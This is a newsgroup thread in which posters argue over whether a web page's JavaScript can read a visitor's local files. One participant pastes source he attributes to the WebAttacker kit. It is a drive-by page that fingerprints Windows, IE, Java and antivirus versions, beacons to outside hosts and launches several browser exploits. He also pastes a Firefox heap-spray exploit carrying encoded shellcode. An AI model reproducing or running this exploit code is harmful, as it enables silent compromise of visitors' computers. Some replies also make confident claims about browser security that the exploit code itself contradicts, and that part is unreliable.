Is it possible to run a command on the client computer ?

[navti]

I saw here

http://java.sun.com/javase/6/docs/technotes/tools/share/jsdocs/index.html

that javascript has built-in methods such as cp, dir, date etc

how do i get these to run on the client computer ?

the client will be linux or osx .

 

[Lee]

navti said:

I saw here

http://java.sun.com/javase/6/docs/technotes/tools/share/jsdocs/index.html

that javascript has built-in methods such as cp, dir, date etc

how do i get these to run on the client computer ?

That page describes Javascript methods available in jrunscript,
which is not the engine you'll find in a web browser.


--

 

[navti]

navti said:





That page describes Javascript methods available in jrunscript,
which is not the engine you'll find in a web browser.

--

ok. so how do i do a dir of a directory and display it in the
browser ?

 

[Ivan Marsh]

ok. so how do i do a dir of a directory and display it in the browser ?

You do not have access to the local machine without having an extension
allowing that access installed on the local machine.

 

[navti]

can you think of the absolute mayhem that would arise if websites could
create/alter the filesystem of the computer that the web browser/client is
on????

there is good reason that that sort of thing is not permitted with plain
ol' javascript.

i visited a website of an enemy and he not only did a listing of my
local files he also copied them to his server. im pretty certqain he
was using javascript.

 

[Ivan Marsh]

i visited a website of an enemy and he not only did a listing of my
local files he also copied them to his server. im pretty certqain he
was using javascript.

No, he was not... and you must have your browser set to trust anything
that it downloads.

 

[Tim Slattery]

i visited a website of an enemy and he not only did a listing of my
local files he also copied them to his server. im pretty certqain he
was using javascript.

He could display a list of your files just by referring your browser
to a URL of file:///c:/ or something like that. That would cause your
browser (IE, at any rate) to show you what's on your disk. Your
"attacker" would never see this, it's simply your browser reading your
disk and showing you the result. In a normal security environment,
there's nothing in Javascript to collect this data and send it
anywhere.

 

[navti]

No, he was not...

it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.

have you seen the code of webattacker ?

i havent but is it not mostly javascript ?

 

[Jeff Johns]

it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.

have you seen the code of webattacker ?

i havent but is it not mostly javascript ?

There is a way to show all the folders of your c: drive in an iframe.
Is this what happened? Did it show your basic filesystem and merely
say it took everything? I agree with the other users, unless you
installed or accepted it cannot happen.

 

[Ivan Marsh]

it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.

have you seen the code of webattacker ?

i havent but is it not mostly javascript ?

I'm guessing it's mostly HTML... but you can't read the local file system
with HTML any more than you can with javascript.

You cannot get to the local machine without installing a conduit to the
local machine.

 

[-Lost]

it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.

have you seen the code of webattacker ?

i havent but is it not mostly javascript ?

You haven't seen the code for Webattacker, yet are positive it is
JavaScript-based? Hrmm...

Anyway, no, I assure you, the problem arose from you using Internet
Explorer 6, *with* lax security settings and the code used to pervert
your system was indeed, Microsoft-specific (VBScript).

 

[navti]

You haven't seen the code for Webattacker, yet are positive it is
JavaScript-based? Hrmm...

Anyway, no, I assure you, the problem arose from you using Internet
Explorer 6, *with* lax security settings and the code used to pervert
your system was indeed, Microsoft-specific (VBScript).

i just found some of the webattacker code

<iframe src="http://fl4w.info/shit/index.php" width=1 height=1></
iframe>
<!--hppage status="protected"-->
<HTML xmlns:IE>
<TITLE>Demo page</TITLE>
<HEAD><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20%4C%41%4E
%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D
%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E
%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B
%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2E
%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F
%53%43%52%49%50%54%3E"));//--></SCRIPT>
<STYLE type='text/css'>
IE\:clientCaps {behavior:url(#default#clientcaps)}
</STYLE>
</HEAD>
<BODY onLoad="setTimeout('Run_BOF()',2000);"><NOSCRIPT>To display this
page you need a browser with JavaScript support.</NOSCRIPT>
<CENTER><H1>This site is under construction...</H1></CENTER>

<IFRAME name="StatPage" width=5 height=5 style="display:none"></
IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></
IFRAME>
<DIV id="ObjectContainer"></DIV>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">

var ExploitNumber=0;

function GetVersion(CLSID)
{
if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
{return
oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
else
{return Array(0,0,0,0);}
}

function Get_Win_Version(IE_vers)
{
if (IE_vers.indexOf('Windows 95') != -1) return "95"
else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
else if (IE_vers.indexOf('Windows 98') != -1) return "98"
else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}

function Run_BOF()
{
if (ExploitNumber==4)
{
self.focus();
for (i=1 ; i <=4 ; i++)
{
document.writeln('<iframe width=1 height=1 border=0
frameborder=0 src="pluginst.htm"></iframe>');
}
document.writeln('<iframe width=1 height=1 border=0
frameborder=0 src="ie0601d.htm"></iframe>');
}
}

var CGI_Script="http://jag.mews.ru/cgi-bin/ie0601.cgi";

if (navigator.appName=="Microsoft Internet Explorer")
{
Click_Request=CGI_Script+"?click";
var InetPath=document.location.href;
j=InetPath.lastIndexOf('/');
InetPath=InetPath.slice(0,j);

var IEversion=navigator.appVersion;
var IEplatform=navigator.platform;
if (IEplatform.search("Win32") != -1)
{
var WinOS=Get_Win_Version(IEversion);
FullVersion=clientInformation.appMinorVersion;
PatchList=FullVersion.split(";");
for (var i=0; i < PatchList.length; i++)
{
ServicePack=PatchList;
j=ServicePack.indexOf('SP');
if (j != -1)
{
ServicePack=ServicePack.substr(j);
Click_Request=Click_Request+'&'+ServicePack;
}
}
StatPage.location=Click_Request;
var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-
AAA5-00401C608500}");
var IE_vers = GetVersion("{89820200-
ECBD-11CF-8B85-00AA005B4383}");
fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
try
{
var oNortonAV=new
ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config
Wizard initialization
fNortonAV=1;
}
catch(e){}
try
{
var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); //
McAfee Security Download Control initialization
fMcAfee=1;
}
catch(e){}

switch (WinOS)
{
case "2K":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM =
5.0.3810.0 or higher
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=2; }
}
break;
case "2K3":
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
break;
case "XP":

if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if
JVM = 5.0.3810.0 or higher
{
for (var i=0; i < PatchList.length; i+
+)
{
if (PatchList=="SP2")
{ XP_SP2_patched=1; }

}
if (XP_SP2_patched==0)
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
}
else
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=5; }
else
{ ExploitNumber=4; }
}
}
break;
default:
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else
{ ExploitNumber=2; } // if JVM =
5.0.3810.0 or higher

break;
}
// launching exploit which number is depends on Windows and
IE versions

switch (ExploitNumber)
{
case 1:
Trojan_Path=CGI_Script+"?exploit=MS03-11";
ObjectContainer.innerHTML='<applet
archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'"
code="TakePrivileges.class" width=1 height=1><param name="ModulePath"
value="'+Trojan_Path+'"></applet>';
break;
case 2:
CHM_base='//ie0601b.chm'+'::'+'/main.htm';
Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
oMSITS=document.createElement("<OBJECT
data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");
document.body.appendChild(oMSITS);
document.title="Loaded !";
break;
case 3:
window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1,menubar=0,titlebar=0,toolbar=0,status=0");
self.focus();
break;
case 4:
;setTimeout('Run_BOF()',2000);
break;
case 5:
PageContainer.location="ie0601e.wmf";
break;
default:
break;
}

}
}
else if (navigator.appName=="Netscape")
{
StatPage.location=CGI_Script+"?click";
if (navigator.userAgent.indexOf('Firefox') != -1)
{
PageContainer.location="mfsa0601.htm";
}
}
else
{
StatPage.location=CGI_Script+"?click";
}
</script>
</BODY>
</HTML>

 

[navti]

this is mfsa0601.htm

<!--hppage status="protected"-->
<HTML><HEAD><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20%4C%41%4E
%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D
%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E
%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B
%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2E
%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F
%53%43%52%49%50%54%3E"));//--></SCRIPT><SCRIPT language="javascript">
var
Shellcode=unescape("%u9090%u9090%u3390%u33c0%uebc9%u5e12%ub966%u0104%ufe8b
%u2e80%u8006%u0136%ue246%uebf7%ue805%uffe9%uffff
%u5bf0%u7a90%u9043%u357b%u087f%u5dfa%u7d90%u0827%u38fa%u4ece
%ub246%ue038%u143d%u1bc5%u3f2f%u7bf9%uc60f
%u12d0%ue108%uf047%u40f4%u7ae4%u65ec%u6590%u082b
%u6de2%u1390%u9050%u2365%ue208%u0b90%u0890%uc8ca%u595a
%u5253%u5554%u4b35%u5353%u4807%u6341%u357c%u7f6a%u076a%uc738%u086b
%u3747%u137f%u4790%u9013%u2377%u90b2%u0f47%u0ef0%u4790%u923b
%u8347%u4790%u9a43%u95c4%u1555%ueff3%u048b%u0404%uf388%u880b
%u2b33%u0443%u9ad7%uc457%u213d%u7734%u74ef%u0404%u9004%u2b5b
%u9203%uc159%ue038%u5858%uf059%u582b%ud704%uc462%u059f%u1591%u58ef
%u0404%u8804%u0bf3%u3388%u692b%ud704%u85c4%ue9df
%uef78%u0447%u0404%u0459%uefd7%u04dc%u0404%u7b6f%u777b
%u3441%u7134%u6c66%u7235%u7c6a%u3578%u7a79%u6834%u6e6c%u6932%u756e
%u6e34%u376a%u373d%u3536%u6c68%u446e%u7f6a%u7377%u6e74%u427b
%u4d52%u4658%u3739%u3a37%u3a32%u0737");
function Run_BOF() {
var heapSprayToAddress=0x12000000;
var heapBlockSize=0x400000;
var ShellcodeSize=Shellcode.length * 2;
var spraySlideSize=heapBlockSize-(ShellcodeSize+0x38);
var spraySlide1 = unescape("%u002C%u11C0");
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
var spraySlide2 = unescape("%u002C%u1200");
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
var spraySlide3 = unescape("%u9090%u9090");
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{ memory=(i%3==0) ? spraySlide1 + Shellcode:
(i%3==1) ? spraySlide2 + Shellcode: spraySlide3 + Shellcode; }
location.href="javascript:void (new InstallVersion());";
var eaxAddress = 0x1180002C;
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}
function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2<spraySlideSize)
{ spraySlide+=spraySlide; }
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</SCRIPT></HEAD>

 

[-Lost]

i just found some of the webattacker code

<snip code>

OK, rather than say VBScript, is the main culprit, I should have said
ActiveX.

All that JavaScript does is pry and develop identifying data to pass to
either a CGI script or to an ActiveX control (apparently to mess with
McAffee?).

 

[navti]

<snip code>

OK, rather than say VBScript, is the main culprit, I should have said
ActiveX.

All that JavaScript does is pry and develop identifying data to pass to
either a CGI script or to an ActiveX control (apparently to mess with
McAffee?).

ok. so there is no way javascript can read a clients local files ?

 

[Andrew Thompson]

....
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher

The (dreaded) MSVM.

If this script found a 3809 or previous build MSVM, it
might have taken advantage (using a Java applet) of any
number of security holes in those Microsoft VM's. Even
the 3810 build has existing security issues that will
never be fixed.

Microsoft themselves (who made the MSVM) recommend
upgrading to the Sun Java Plug-In. When security
issues are discovered in the Java Plug-In - they
are fixed quickly, and the end users are prompted
to update.

Note those comments have little to do with Javascript,
it is Java (a different language) that runs in the MSVM
and the Java Plug-In. The script is apparently attempting
to determine what the applet should attack - though the
author might have taken a simpler approach that required
no javascript.

I suspect, however, that one of the other poster's got
the answer right when they suggested the host had done
something to make it *appear* to you that information
had been stolen (linking to a common directory on C:
drive would be enough to convince most people who
use IE).

Andrew T.

 

[navti]

it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.

...
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher

The (dreaded) MSVM.

If this script found a 3809 or previous build MSVM, it
might have taken advantage (using a Java applet) of any
number of security holes in those Microsoft VM's. Even
the 3810 build has existing security issues that will
never be fixed.

Microsoft themselves (who made the MSVM) recommend
upgrading to the Sun Java Plug-In. When security
issues are discovered in the Java Plug-In - they
are fixed quickly, and the end users are prompted
to update.

Note those comments have little to do with Javascript,
it is Java (a different language) that runs in the MSVM
and the Java Plug-In. The script is apparently attempting
to determine what the applet should attack - though the
author might have taken a simpler approach that required
no javascript.

I suspect, however, that one of the other poster's got
the answer right when they suggested the host had done
something to make it *appear* to you that information
had been stolen (linking to a common directory on C:
drive would be enough to convince most people who
use IE).

Andrew T.

he stole my files . i know this for a fact.
why would you think it was otherwise ? have you been living down a
mineshaft for the past 5 years ? never heard of xss ? are you in some
sort of state of denial ?
only an ignoramus would try and deny it was possible for a webserver
to compromise a client's machine.

my mistake is thinking javascript was enough . obviously it was a
combination of javascript, java, activex , php , xml etc etc

 

[Dag Sunde]

navti wrote:
it all happened automatically without any intervention. i was
using win2k and ie6 at the time. i have since switched to mac os
x. ...
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher

The (dreaded) MSVM.

he stole my files . i know this for a fact.
why would you think it was otherwise ? have you been living down a
mineshaft for the past 5 years ? never heard of xss ? are you in some
sort of state of denial ?
only an ignoramus would try and deny it was possible for a webserver
to compromise a client's machine.

my mistake is thinking javascript was enough . obviously it was a
combination of javascript, java, activex , php , xml etc etc

JavaScript, php, xml and etc. does not have *anything* to do with it!

The only way a webserver can compromise a client in the way you described
is eiter:
1.) A signed Java Applet where you explicitly have ansvered "Yes" when
asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have ansvered "Yes"
when
asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of your
browser
wide-open.

Neither PHP nor JavaScript is able to access your files.

 

[navti]

The only way a webserver can compromise a client in the way you described
is eiter:
1.) A signed Java Applet where you explicitly have ansvered "Yes" when
asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have ansvered "Yes"
when
asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of your
browser
wide-open.

Neither PHP nor JavaScript is able to access your files.

what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?

 

[Lee]

navti said:

what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?

You know this for a fact? Can you name such a site?
Or did this happen to a friend of a friend?


--